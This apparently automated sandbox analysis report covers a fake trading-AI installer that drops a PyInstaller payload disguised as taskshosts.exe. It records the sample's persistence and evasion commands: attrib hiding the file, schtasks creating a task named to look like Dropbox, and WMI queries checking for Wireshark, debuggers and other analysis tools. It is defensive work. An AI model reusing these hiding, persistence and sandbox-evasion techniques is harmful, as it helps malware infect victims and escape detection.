      Source: Binary string: D:\a\1\b\bin\win32\_hashlib.pdb source: taskshosts.exe, 0000000F.00000003.1928056108.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 00000013.00000003.2015874093.000000000124E000.00000004.00000020.00020000.00000000.sdmp, _hashlib.pyd.15.dr
      Source: Binary string: D:\a\1\b\bin\win32\_decimal.pdb source: taskshosts.exe, 0000000F.00000003.1927843019.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 00000013.00000003.2015682768.000000000124D000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: D:\a\1\b\bin\win32\_lzma.pdb source: taskshosts.exe, 0000000F.00000003.1928187140.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 00000013.00000003.2016030196.000000000124E000.00000004.00000020.00020000.00000000.sdmp, _lzma.pyd.19.dr, _lzma.pyd.15.dr
      Source: Binary string: D:\a\1\b\bin\win32\_queue.pdb source: taskshosts.exe, 0000000F.00000003.1928565694.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 00000013.00000003.2016688883.000000000124E000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: D:\a\1\b\bin\win32\unicodedata.pdb source: taskshosts.exe, 0000000F.00000003.1932942812.00000000009A6000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 00000013.00000003.2025854099.0000000001258000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: D:\a\1\b\bin\win32\_overlapped.pdb source: taskshosts.exe, 0000000F.00000003.1928457624.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 00000013.00000003.2016484803.000000000124E000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: D:\a\1\b\bin\win32\_socket.pdb source: taskshosts.exe, 0000000F.00000003.1928682372.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 00000013.00000003.2016815643.000000000124E000.00000004.00000020.00020000.00000000.sdmp, _socket.pyd.19.dr, _socket.pyd.15.dr
      Source: C:\Users\user\AppData\Local\Temp\is-M2GGN.tmp\idp.exeCode function: 6_2_002F8180 GetCurrentProcessId,GetCurrentThreadId,LoadLibraryW,GetProcAddress,FreeLibrary,GetTickCount,QueryPerformanceCounter,GetTickCount,6_2_002F8180
      Source: XS_Trade_AI-newest_release_.exeStatic PE information: section name: .didata
      Source: XS_Trade_AI-newest_release_.tmp.0.drStatic PE information: section name: .didata
      Source: XS_Trade_AI-newest_release_.tmp.2.drStatic PE information: section name: .didata
      Source: idp.exe.3.drStatic PE information: section name: .sxdata
      Source: libcrypto-1_1.dll.15.drStatic PE information: section name: .00cfg
      Source: libssl-1_1.dll.15.drStatic PE information: section name: .00cfg
      Source: libcrypto-1_1.dll.19.drStatic PE information: section name: .00cfg
      Source: libssl-1_1.dll.19.drStatic PE information: section name: .00cfg
      Source: C:\Users\user\AppData\Local\Temp\is-5ULBA.tmp\XS_Trade_AI-newest_release_.tmpCode function: 3_3_009FC386 pushfd ; ret 3_3_009FC3A9
      Source: C:\Users\user\AppData\Local\Temp\is-5ULBA.tmp\XS_Trade_AI-newest_release_.tmpCode function: 3_3_009FC358 push esp; ret 3_3_009FC359
      Source: C:\Users\user\AppData\Local\Temp\is-M2GGN.tmp\idp.exeCode function: 6_2_003150F0 push eax; ret 6_2_0031510E
      Source: C:\Users\user\AppData\Local\Temp\is-M2GGN.tmp\idp.exeCode function: 6_2_00315470 push eax; ret 6_2_0031549E
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeCode function: 15_2_0068E44C push E8006BF0h; iretd 15_2_0068E451
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeCode function: 16_2_0068E44C push E8006BF0h; iretd 16_2_0068E451
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 21_2_0044AEB8 push ecx; ret 21_2_0044AEB9

      Persistence and Installation Behavior

      barindex
      Found pyInstaller with non standard icon
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeProcess created: C:\Users\user\AppData\Local\programs\common\taskshosts.exe C:\Windows\system32\config\systemprofile\AppData\Local\programs\common\taskshosts.exe
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeProcess created: C:\Users\user\AppData\Local\programs\common\taskshosts.exe
      Uses attrib.exe to hide files
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\attrib.exe attrib +H +S "C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe"
      Source: C:\Users\user\AppData\Local\Temp\is-7K4JS.tmp\XS_Trade_AI-newest_release_.tmpFile created: C:\Users\user\AppData\Local\Temp\is-342QK.tmp\DontSleep_x64.exeJump to dropped file
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78242\_bz2.pydJump to dropped file
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78242\_ctypes.pydJump to dropped file
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78242\_lzma.pydJump to dropped file
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI80162\_ssl.pydJump to dropped file
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78242\_socket.pydJump to dropped file
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI80162\select.pydJump to dropped file
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI80162\unicodedata.pydJump to dropped file
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78242\_queue.pydJump to dropped file
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI80162\_socket.pydJump to dropped file
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI80162\libssl-1_1.dllJump to dropped file
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78242\VCRUNTIME140.dllJump to dropped file
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78242\_multiprocessing.pydJump to dropped file
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78242\unicodedata.pydJump to dropped file
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78242\libcrypto-1_1.dllJump to dropped file
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78242\_decimal.pydJump to dropped file
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78242\_overlapped.pydJump to dropped file
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI80162\_hashlib.pydJump to dropped file
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI80162\_bz2.pydJump to dropped file
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI80162\_overlapped.pydJump to dropped file
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78242\libffi-7.dllJump to dropped file
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI80162\_queue.pydJump to dropped file
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78242\libssl-1_1.dllJump to dropped file
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI80162\_uuid.pydJump to dropped file
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78242\select.pydJump to dropped file
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78242\python39.dllJump to dropped file
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI80162\_ctypes.pydJump to dropped file
      Source: C:\Users\user\AppData\Local\Temp\is-5ULBA.tmp\XS_Trade_AI-newest_release_.tmpFile created: C:\Users\user\AppData\Local\Temp\is-M2GGN.tmp\DontSleep_x64.exeJump to dropped file
      Source: C:\Users\user\AppData\Local\Temp\is-5ULBA.tmp\XS_Trade_AI-newest_release_.tmpFile created: C:\Users\user\AppData\Local\Temp\is-M2GGN.tmp\_isetup\_setup64.tmpJump to dropped file
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI80162\_lzma.pydJump to dropped file
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI80162\_decimal.pydJump to dropped file
      Source: C:\Users\user\AppData\Local\Temp\is-5ULBA.tmp\XS_Trade_AI-newest_release_.tmpFile created: C:\Users\user\AppData\Local\Temp\is-M2GGN.tmp\idp.dllJump to dropped file
      Source: C:\Users\user\Desktop\XS_Trade_AI-newest_release_.exeFile created: C:\Users\user\AppData\Local\Temp\is-7K4JS.tmp\XS_Trade_AI-newest_release_.tmpJump to dropped file
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI80162\python39.dllJump to dropped file
      Source: C:\Users\user\AppData\Local\Temp\is-7K4JS.tmp\XS_Trade_AI-newest_release_.tmpFile created: C:\Users\user\AppData\Local\Temp\is-342QK.tmp\idp.dllJump to dropped file
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI80162\libffi-7.dllJump to dropped file
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI80162\libcrypto-1_1.dllJump to dropped file
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78242\_ssl.pydJump to dropped file
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI80162\pyexpat.pydJump to dropped file
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78242\_asyncio.pydJump to dropped file
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78242\pyexpat.pydJump to dropped file
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI80162\_asyncio.pydJump to dropped file
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78242\_uuid.pydJump to dropped file
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI80162\VCRUNTIME140.dllJump to dropped file
      Source: C:\Users\user\AppData\Local\Temp\is-7K4JS.tmp\XS_Trade_AI-newest_release_.tmpFile created: C:\Users\user\AppData\Local\Temp\is-342QK.tmp\_isetup\_setup64.tmpJump to dropped file
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78242\_hashlib.pydJump to dropped file
      Source: C:\Users\user\AppData\Local\Temp\is-5ULBA.tmp\XS_Trade_AI-newest_release_.tmpFile created: C:\Users\user\AppData\Local\Temp\is-M2GGN.tmp\idp.exeJump to dropped file
      Source: C:\Users\user\Desktop\XS_Trade_AI-newest_release_.exeFile created: C:\Users\user\AppData\Local\Temp\is-5ULBA.tmp\XS_Trade_AI-newest_release_.tmpJump to dropped file
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI80162\_multiprocessing.pydJump to dropped file
      Source: C:\Users\user\AppData\Local\Temp\is-M2GGN.tmp\idp.exeFile created: C:\Users\user\AppData\Local\Programs\Common\yyttrsu.exeJump to dropped file

      Boot Survival

      barindex
      Uses schtasks.exe or at.exe to add and modify task schedules
      Source: C:\Users\user\AppData\Local\Temp\is-5ULBA.tmp\XS_Trade_AI-newest_release_.tmpProcess created: C:\Windows\SysWOW64\schtasks.exe "schtasks.exe" /create /xml C:\Users\user\AppData\Local\Temp\is-M2GGN.tmp\lang /tn DropboxSyncTaskMachineUA /f
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeCode function: 15_2_00685270 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,15_2_00685270
      Source: C:\Users\user\Desktop\XS_Trade_AI-newest_release_.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\is-7K4JS.tmp\XS_Trade_AI-newest_release_.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\is-7K4JS.tmp\XS_Trade_AI-newest_release_.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\is-7K4JS.tmp\XS_Trade_AI-newest_release_.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\is-7K4JS.tmp\XS_Trade_AI-newest_release_.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\is-7K4JS.tmp\XS_Trade_AI-newest_release_.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\is-7K4JS.tmp\XS_Trade_AI-newest_release_.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\is-7K4JS.tmp\XS_Trade_AI-newest_release_.tmpProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\is-7K4JS.tmp\XS_Trade_AI-newest_release_.tmpProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\XS_Trade_AI-newest_release_.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\is-5ULBA.tmp\XS_Trade_AI-newest_release_.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\is-5ULBA.tmp\XS_Trade_AI-newest_release_.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\is-5ULBA.tmp\XS_Trade_AI-newest_release_.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\is-5ULBA.tmp\XS_Trade_AI-newest_release_.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\is-5ULBA.tmp\XS_Trade_AI-newest_release_.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\is-5ULBA.tmp\XS_Trade_AI-newest_release_.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\is-5ULBA.tmp\XS_Trade_AI-newest_release_.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\is-5ULBA.tmp\XS_Trade_AI-newest_release_.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\is-5ULBA.tmp\XS_Trade_AI-newest_release_.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

      Malware Analysis System Evasion

      barindex
      Query firmware table information (likely to detect VMs)
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeSystem information queried: FirmwareTableInformationJump to behavior
      Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
      Source: XS_Trade_AI-newest_release_.tmp, 00000001.00000002.1843196105.00000000009E8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: WMI.EXECQUERY(SELECT * FROM WIN32_PROCESS WHERE NAME="SYSANALYZER.EXE");
      Source: XS_Trade_AI-newest_release_.tmp, 00000001.00000002.1843196105.00000000009E8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: WMI.EXECQUERY(SELECT * FROM WIN32_PROCESS WHERE NAME="HOOKEXPLORER.EXE");
      Source: XS_Trade_AI-newest_release_.tmp, 00000001.00000002.1843196105.00000000009E8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: TDUETVWHKE6PADA1.1ELECT * FROM WIN32_PROCESS WHERE NAME="SYSANALYZER.EXE"C
      Source: XS_Trade_AI-newest_release_.tmp, 00000001.00000002.1843196105.00000000009E8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: WMI.EXECQUERY(SELECT * FROM WIN32_PROCESS WHERE NAME="DUMPCAP.EXE");
      Source: XS_Trade_AI-newest_release_.tmp, 00000001.00000002.1843196105.00000000009E8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: WMI.EXECQUERY(SELECT * FROM WIN32_PROCESS WHERE NAME="PROCESSHACKER.EXE");
      Source: XS_Trade_AI-newest_release_.tmp, 00000001.00000002.1843196105.00000000009E8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: WMI.EXECQUERY(SELECT * FROM WIN32_PROCESS WHERE NAME="SNIFF_HIT.EXE");
      Source: XS_Trade_AI-newest_release_.tmp, 00000001.00000002.1843196105.00000000009E8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: WMI.EXECQUERY(SELECT * FROM WIN32_PROCESS WHERE NAME="OLLYDBG.EXE");
      Source: XS_Trade_AI-newest_release_.tmp, 00000001.00000002.1843196105.00000000009E8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: WMI.EXECQUERY(SELECT * FROM WIN32_PROCESS WHERE NAME="PROCMON.EXE");
      Source: XS_Trade_AI-newest_release_.tmp, 00000001.00000002.1843196105.00000000009E8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: WMI.EXECQUERY(SELECT * FROM WIN32_PROCESS WHERE NAME="REGMON.EXE");
      Source: XS_Trade_AI-newest_release_.tmp, 00000001.00000002.1843196105.00000000009E8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: LECT * FROM WIN32_PROCESS WHERE NAME="SNIFF_HIT.EXE"XE"E"4
      Source: XS_Trade_AI-newest_release_.tmp, 00000001.00000002.1843196105.00000000009E8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: WMI.EXECQUERY(SELECT * FROM WIN32_PROCESS WHERE NAME="PETOOLS.EXE");
      Source: XS_Trade_AI-newest_release_.tmp, 00000001.00000002.1843196105.00000000009E8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ME="FIDDLER.EXE");
      Source: XS_Trade_AI-newest_release_.tmp, 00000001.00000002.1843196105.00000000009E8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: WMI.EXECQUERY(SELECT * FROM WIN32_PROCESS WHERE NAME="PROC_ANALYZER.EXE");
      Source: XS_Trade_AI-newest_release_.tmp, 00000001.00000002.1843196105.00000000009E8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: WMI.EXECQUERY(SELECT * FROM WIN32_PROCESS WHERE NAME="FIDDLER.EXE");
      Source: XS_Trade_AI-newest_release_.tmp, 00000001.00000003.1841392473.00000000023F5000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: 6SELECT * FROM WIN32_PROCESS WHERE NAME="SNIFF_HIT.EXE"E"E"
      Source: XS_Trade_AI-newest_release_.tmp, 00000001.00000002.1843196105.00000000009E8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: WMI.EXECQUERY(SELECT * FROM WIN32_PROCESS WHERE NAME="FILEMON.EXE");
      Source: XS_Trade_AI-newest_release_.tmp, 00000001.00000002.1843196105.00000000009E8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: WMI.EXECQUERY(SELECT * FROM WIN32_PROCESS WHERE NAME="WIRESHARK.EXE");
      Source: XS_Trade_AI-newest_release_.tmp, 00000001.00000002.1843196105.0000000000A57000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: EXECQUERYSELECT * FROM WIN32_PROCESS WHERE NAME="PETOOLS.EXE"
      Source: XS_Trade_AI-newest_release_.tmp, 00000001.00000002.1843196105.00000000009E8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: WMI.EXECQUERY(SELECT * FROM WIN32_PROCESS WHERE NAME="X64DBG.EXE");
      Source: XS_Trade_AI-newest_release_.tmp, 00000001.00000002.1843196105.00000000009E8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: WMI.EXECQUERY(SELECT * FROM WIN32_PROCESS WHERE NAME="IDAQ.EXE");
      Source: XS_Trade_AI-newest_release_.tmp, 00000001.00000002.1843196105.00000000009E8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: WMI.EXECQUERY(SELECT * FROM WIN32_PROCESS WHERE NAME="WINDBG.EXE");
      Source: XS_Trade_AI-newest_release_.tmp, 00000001.00000002.1843196105.00000000009E8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: L6SELECT * FROM WIN32_PROCESS WHERE NAME="SNIFF_HIT.EXE"
      Source: XS_Trade_AI-newest_release_.tmp, 00000001.00000002.1843196105.00000000009E8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: WMI.EXECQUERY(SELECT * FROM WIN32_PROCESS WHERE NAME="AUTORUNS.EXE");
      Source: XS_Trade_AI-newest_release_.tmp, 00000001.00000002.1843196105.00000000009E8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: WMI.EXECQUERY(SELECT * FROM WIN32_PROCESS WHERE NAME="XENSERVICE.EXE");
      Source: XS_Trade_AI-newest_release_.tmp, 00000001.00000002.1843196105.00000000009E8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: EXECQUERYSELECT * FROM WIN32_PROCESS WHERE NAME="XENSERVICE.EXE"
      Source: XS_Trade_AI-newest_release_.tmp, 00000001.00000002.1843196105.00000000009E8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: WMI.EXECQUERY(SELECT * FROM WIN32_PROCESS WHERE NAME="AUTORUNSC.EXE");
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI80162\_lzma.pydJump to dropped file
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI80162\_decimal.pydJump to dropped file
      Source: C:\Users\user\AppData\Local\Temp\is-7K4JS.tmp\XS_Trade_AI-newest_release_.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-342QK.tmp\DontSleep_x64.exeJump to dropped file
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78242\_bz2.pydJump to dropped file
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78242\_ctypes.pydJump to dropped file
      Source: C:\Users\user\AppData\Local\Temp\is-5ULBA.tmp\XS_Trade_AI-newest_release_.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-M2GGN.tmp\idp.dllJump to dropped file
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78242\_lzma.pydJump to dropped file
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI80162\_ssl.pydJump to dropped file
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI80162\python39.dllJump to dropped file
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78242\_socket.pydJump to dropped file
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI80162\select.pydJump to dropped file
      Source: C:\Users\user\AppData\Local\Temp\is-7K4JS.tmp\XS_Trade_AI-newest_release_.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-342QK.tmp\idp.dllJump to dropped file
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI80162\unicodedata.pydJump to dropped file
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78242\_queue.pydJump to dropped file
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI80162\libssl-1_1.dllJump to dropped file
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI80162\_socket.pydJump to dropped file
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78242\_multiprocessing.pydJump to dropped file
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78242\_ssl.pydJump to dropped file
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78242\unicodedata.pydJump to dropped file
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI80162\pyexpat.pydJump to dropped file
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78242\pyexpat.pydJump to dropped file
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78242\_asyncio.pydJump to dropped file
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78242\_decimal.pydJump to dropped file
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI80162\_asyncio.pydJump to dropped file
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78242\_overlapped.pydJump to dropped file
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI80162\_bz2.pydJump to dropped file
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI80162\_hashlib.pydJump to dropped file
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI80162\_overlapped.pydJump to dropped file
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78242\_uuid.pydJump to dropped file
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI80162\_queue.pydJump to dropped file
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78242\libssl-1_1.dllJump to dropped file
